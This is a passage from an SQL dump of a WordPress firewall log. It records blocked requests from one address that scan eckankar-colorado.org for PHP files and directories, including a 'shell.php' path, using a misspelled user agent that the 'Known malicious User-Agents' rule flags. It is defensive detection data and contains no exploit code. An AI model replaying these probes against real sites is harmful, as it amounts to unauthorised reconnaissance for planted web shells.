User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL3NwYWNpbmcucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134221,1699995069.021634,1699995069.012900,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/shadow.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL3NoYWRvdy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134222,1699995067.322746,1699995067.313800,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/settings.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL3NldHRpbmdzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134223,1699995065.813407,1699995065.804700,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/position.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL3Bvc2l0aW9uLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134224,1699995064.062316,1699995064.053000,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/layout.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL2xheW91dC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134225,1699995062.403602,1699995060.184300,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/elements.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL2VsZW1lbnRzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134226,1699995058.519440,1699995058.510700,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/duotone.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL2R1b3RvbmUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134227,1699995056.595423,1699995056.586000,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/dimensions.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL2RpbWVuc2lvbnMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134228,1699995054.479287,1699995054.463300,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/border.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL2JvcmRlci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134229,1699995051.507063,1699995051.498300,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/background.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL2JhY2tncm91bmQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134230,1699995046.200428,1699995046.191000,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-patterns/query-small-posts.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXBhdHRlcm5zL3F1ZXJ5LXNtYWxsLXBvc3RzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134231,1699995044.624413,1699995044.615500,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-patterns/query-offset-posts.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXBhdHRlcm5zL3F1ZXJ5LW9mZnNldC1wb3N0cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134232,1699995042.933422,1699995042.924100,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-patterns/query-medium-posts.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXBhdHRlcm5zL3F1ZXJ5LW1lZGl1bS1wb3N0cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134233,1699995041.538171,1699995041.529300,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-patterns/query-grid-posts.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXBhdHRlcm5zL3F1ZXJ5LWdyaWQtcG9zdHMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134234,1699995038.239818,1699995038.231000,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Text/Diff/Engine/shell.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1RleHQvRGlmZi9FbmdpbmUvc2hlbGwucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134235,1699995033.203344,1699995033.188100,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/php/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BocC8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134236,1699995031.656063,1699995031.634100,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/plugins/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BsdWdpbnMv\",\"category\":\"brute-force\",\"ssl\":1}'),(134237,1699995029.818025,1699995029.809300,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/images/stories/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2ltYWdlcy9zdG9yaWVzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134238,1699995028.386123,1699995028.377400,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/Assets/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0Fzc2V0cy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134239,1699995026.832679,1699995026.823900,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/include/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2luY2x1ZGUv\",\"category\":\"brute-force\",\"ssl\":1}'),(134240,1699995025.258492,1699995025.249700,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/admin/editor/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL2VkaXRvci8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134241,1699995023.648948,1699995023.640200,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/files/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2ZpbGVzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134242,1699995021.888485,1699995021.879900,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/shop/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3Nob3Av\",\"category\":\"brute-force\",\"ssl\":1}'),(134243,1699995020.363158,1699995020.354400,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/template/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3RlbXBsYXRlLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134244,1699995018.324203,1699995018.314800,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/system/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N5c3RlbS8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134245,1699995016.769606,1699995016.757500,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/Site/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L1NpdGUv\",\"category\":\"brute-force\",\"ssl\":1}'),(134246,1699995015.009203,1699995014.999900,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/modules/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L21vZHVsZXMv\",\"category\":\"brute-force\",\"ssl\":1}'),(134247,1699995013.295419,1699995013.286000,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/local/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 